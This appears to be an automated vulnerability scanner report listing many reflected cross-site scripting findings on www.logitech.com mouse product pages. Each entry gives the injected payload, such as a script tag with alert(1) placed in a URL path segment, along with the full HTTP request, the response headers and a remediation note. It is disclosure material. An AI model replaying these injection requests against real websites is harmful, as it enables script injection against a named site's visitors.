<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c48ea</script><script>alert(1)</script>4b92e8d8a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c48ea</script><script>alert(1)</script>4b92e8d8a92/mice-pointers/mice/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a4"%3b21487b74b14 was submitted in the REST URL parameter 1. This input was echoed as bb7a4";21487b74b14 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usbb7a4"%3b21487b74b14/mice-pointers/mice/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d347</script><script>alert(1)</script>56dc243b731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers7d347</script><script>alert(1)</script>56dc243b731/mice/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dec7"><script>alert(1)</script>7be2a68cdc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers6dec7"><script>alert(1)</script>7be2a68cdc7/mice/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9cfc</script><script>alert(1)</script>6df299ae1b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/miced9cfc</script><script>alert(1)</script>6df299ae1b4/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d24b"><script>alert(1)</script>d1366788500 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice2d24b"><script>alert(1)</script>d1366788500/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73438</script><script>alert(1)</script>06d23efeb51 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices73438</script><script>alert(1)</script>06d23efeb51/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9152"><script>alert(1)</script>65bd13744e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devicesf9152"><script>alert(1)</script>65bd13744e6/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8bdd</script><script>alert(1)</script>2375409bb25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/7275b8bdd</script><script>alert(1)</script>2375409bb25 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed73"><script>alert(1)</script>065b90ac5b9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/7275fed73"><script>alert(1)</script>065b90ac5b9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a96</script><script>alert(1)</script>21adf898d37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /20a96</script><script>alert(1)</script>21adf898d37/mice-pointers/mice/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d77d8"><script>alert(1)</script>65546cb1492 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usd77d8"><script>alert(1)</script>65546cb1492/mice-pointers/mice/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abfa2"%3b2f86607ae2b was submitted in the REST URL parameter 1. This input was echoed as abfa2";2f86607ae2b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usabfa2"%3b2f86607ae2b/mice-pointers/mice/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7971e</script><script>alert(1)</script>a90a440f20a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers7971e</script><script>alert(1)</script>a90a440f20a/mice/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bbab"><script>alert(1)</script>a071ea08986 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers1bbab"><script>alert(1)</script>a071ea08986/mice/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5440b"><script>alert(1)</script>689c084e42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice5440b"><script>alert(1)</script>689c084e42/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b36f</script><script>alert(1)</script>040f23f5763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice6b36f</script><script>alert(1)</script>040f23f5763/devices/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffd1e"><script>alert(1)</script>d64a266bc54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devicesffd1e"><script>alert(1)</script>d64a266bc54/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b48f9</script><script>alert(1)</script>b40b60e19a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devicesb48f9</script><script>alert(1)</script>b40b60e19a7/7276 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 329ad</script><script>alert(1)</script>31ba31794d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/7276329ad</script><script>alert(1)</script>31ba31794d9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:58:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f7d0"><script>alert(1)</script>9087c10d451 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/72764f7d0"><script>alert(1)</script>9087c10d451 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec2df"%3b9ee06267a8c was submitted in the REST URL parameter 1. This input was echoed as ec2df";9ee06267a8c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usec2df"%3b9ee06267a8c/mice-pointers/mice/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8948"><script>alert(1)</script>4f230d11a67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf8948"><script>alert(1)</script>4f230d11a67/mice-pointers/mice/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c1a</script><script>alert(1)</script>026dc8a0bdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /66c1a</script><script>alert(1)</script>026dc8a0bdc/mice-pointers/mice/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0d0d</script><script>alert(1)</script>b7aa69de7d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointersb0d0d</script><script>alert(1)</script>b7aa69de7d3/mice/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0294"><script>alert(1)</script>8cad555bee1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersb0294"><script>alert(1)</script>8cad555bee1/mice/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f26</script><script>alert(1)</script>d248f5f2bf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice40f26</script><script>alert(1)</script>d248f5f2bf7/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0bae"><script>alert(1)</script>26aca806746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/miceb0bae"><script>alert(1)</script>26aca806746/devices/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:12 GMT Connection: close
